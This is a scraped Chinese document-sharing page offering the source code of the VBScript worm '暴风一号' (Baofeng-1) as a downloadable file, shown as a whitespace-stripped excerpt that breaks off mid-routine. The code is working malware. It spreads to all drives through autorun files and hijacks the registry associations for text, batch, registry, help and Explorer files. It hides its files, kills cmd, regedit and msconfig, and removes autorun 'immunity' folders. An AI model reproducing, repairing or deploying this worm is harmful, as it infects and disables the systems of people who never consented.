暴风一号源码Word文档下载推荐.docx
《暴风一号源码Word文档下载推荐.docx》由会员分享,可在线阅读,更多相关《暴风一号源码Word文档下载推荐.docx(22页珍藏版)》请在冰点文库上搜索。
run"
runpath=left(wscript.scriptfullname,2)
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("
%systemroot%\system\svchost.exe"
virusload)
txt"
"
log"
"
ini"
"
inf"
runpath="
%systemroot%\system32\notepad.exe"
param
bat"
cmd"
cmd/cechohi!
i'
mhere!
pause"
reg"
regedit.exe"
trim(param)&
chm"
hh.exe"
hlp"
winhlp32.exe"
dir"
left(trim(param),len(trim(param))-3)&
oie"
%programfiles%\internetexplorer\iexplore.exe"
omc"
explorer.exe/n,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
emc"
explorer.exe/n,/e,:
caseelse
ifpredblinstance=truethen
wscript.quit
endif
timeout=datediff("
ww"
getinfecteddate,date)-12
iftimeout>
0andmonth(date)=day(date)then
callvirusalert()
callmakejoke(cint(month(date)))
callmonitorsystem()
endselect
endsub
submonitorsystem()
onerrorresumenext:
dimprocessnames,exefullnames
processnames=array("
cmd.exe"
regedit.exe"
regedit.scr"
regedit.pif"
msconfig.exe"
vbsfullnames=array(getmainvirus
(1))
do
callkillprocess(processnames)
callinvadesystem(getmainvirus
(1),getmainvirus(0))
callkeepprocess(vbsfullnames)
wscript.sleep3000
subinvadesystem(virusloadpath,virusasspath)
dimload_value,file_value,ie_value,mycpt_value1,mycpt_value2,hcuload,hcuver,viruscode,version
load_value="
virusloadpath&
file_value="
%systemroot%\system32\wscript.exe"
virusasspath&
%1%*"
ie_value="
oie"
mycpt_value1="
omc"
mycpt_value2="
emc"
hcuload="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\load"
hcuver="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\ver"
hcudate="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\date"
viruscode=getcode(wscript.scriptfullname)
version=1
hostsourcepath=fso.getspecialfolder
(1)&
\wscript.exe"
hostfilepath=fso.getspecialfolder(0)&
\system\svchost.exe"
foreachdriveinfso.drives
ifdrive.isreadyand(drive.drivetype=1ordrive.drivetype=2ordrive.drivetype=3)then
diskvirusname=getserialnumber(drive.driveletter)&
.vbs"
callcreateautorun(drive.driveletter,diskvirusname)
callinfectroot(drive.driveletter,diskvirusname)
next
iffso.fileexists(virusasspath)=falseorfso.fileexists(virusloadpath)=falseorfso.fileexists(hostfilepath)=falseorgetversion()<
versionthen
ifgetfilesystemtype(getsystemdrive())="
ntfs"
then
callcreatefile(viruscode,virusasspath)
callcreatefile(viruscode,virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
else
callcreatefile(viruscode,virusasspath)
callsethiddenattr(virusasspath)
callsethiddenattr(virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
endif
ifreadreg(hcuload)<
>
load_valuethen
callwritereg(hcuload,load_value,"
ifgetversion()<
callwritereg(hcuver,version,"
ifgetinfecteddate()="
callwritereg(hcudate,date,"
ifreadreg("
hkey_local_machine\software\classes\txtfile\shell\open\command\"
)<
file_valuethen
callsettxtfileass(virusasspath)
hkey_local_machine\software\classes\inifile\shell\open\command\"
callsetinifileass(virusasspath)
hkey_local_machine\software\classes\inffile\shell\open\command\"
callsetinffileass(virusasspath)
hkey_local_machine\software\classes\batfile\shell\open\command\"
callsetbatfileass(virusasspath)
hkey_local_machine\software\classes\cmdfile\shell\open\command\"
callsetcmdfileass(virusasspath)
hkey_local_machine\software\classes\regfile\shell\open\command\"
callsetregfileass(virusasspath)
hkey_local_machine\software\classes\chm.file\shell\open\command\"
callsetchmfileass(virusasspath)
hkey_local_machine\software\classes\hlpfile\shell\open\command\"
callsethlpfileass(virusasspath)
hkey_local_machine\software\classes\applications\iexplore.exe\shell\open\command\"
ie_valuethen
callsetieass(virusasspath)
hkey_classes_root\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shell\openhomepage\command\"
hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\open\command\"
mycpt_value1then
allsetmycomputerass(virusasspath)
hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\explore\command\"
mycpt_value2then
callsetmycomputerass(virusasspath)
callregset()
subcopyfile(source,pathf)
iffso.fileexists(pathf)then
fso.deletefilepathf,true
fso.copyfilesource,pathf
subcreatefile(code,pathf)
dimfiletext
setfiletext=fso.opentextfile(pathf,2,false)
filetext.writecode
filetext.close
else
setfiletext=fso.opentextfile(pathf,2,true)
subregset()
onerrorresumenext
dimregpath1,regpath2,regpath3,regpath4
regpath1="
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\nohidden\checkedvalue"
regpath2="
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue"
regpath3="
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun"
regpath4="
hkey_classes_root\lnkfile\isshortcut"
callwritereg(regpath1,3,"
reg_dword"
callwritereg(regpath2,2,"
callwritereg(regpath3,0,"
calldeletereg(regpath4)
subkillprocess(processnames)
setwmiservice=getobject("
winmgmts:
\\.\root\cimv2"
foreachprocessnameinprocessnames
setprocesslist=wmiservice.execquery("
select*fromwin32_processwherename='
processname&
'
foreachprocessinprocesslist
intreturn=process.terminate
ifintreturn<
0then
wshshell.run"
cmd/cntsd-cq-p"
process.handle,vbhide,false
next
subkillimmunity(d)
immunityfolder=d&
\autorun.inf"
iffso.folderexists(immunityfolder)then
wshshell.run("
cmd/ccacls"
immunityfolder&
&
/t/e/c/geveryone:
f"
),vbhide,true
cmd/crd/s/q"
immunityfolder),vbhide,true
subkeepprocess(vbsfullnames)
foreachvbsfullnameinvbsfullnames
ifvbsprocesscount(vbsfullname)<
2then
run("
vbsfullname)
subwritereg(strkey,value,vtype)
dimtmps
settmps=createobject("
ifvtype="
tmps.regwritestrkey,value
tmps.regwritestrkey,value,vtype
settmps=nothing
subdeletereg(strkey)
tmps.regdeletestrkey
subsethiddenattr(path)
dimvf
setvf=fso.getfile(path)
setvf=fso.getfolder(path)
vf.attributes=6
subrun(exefullname)
dimwshshell
setwshshell=wscript.createobject("
wshshell.runexefullname
setwshshell=nothing
subinfectroot(d,virusname)
dimvbscode
vbscode=getcode(wscript.scriptfullname)
vbspath=d&
\"
virusname
if
升级会员 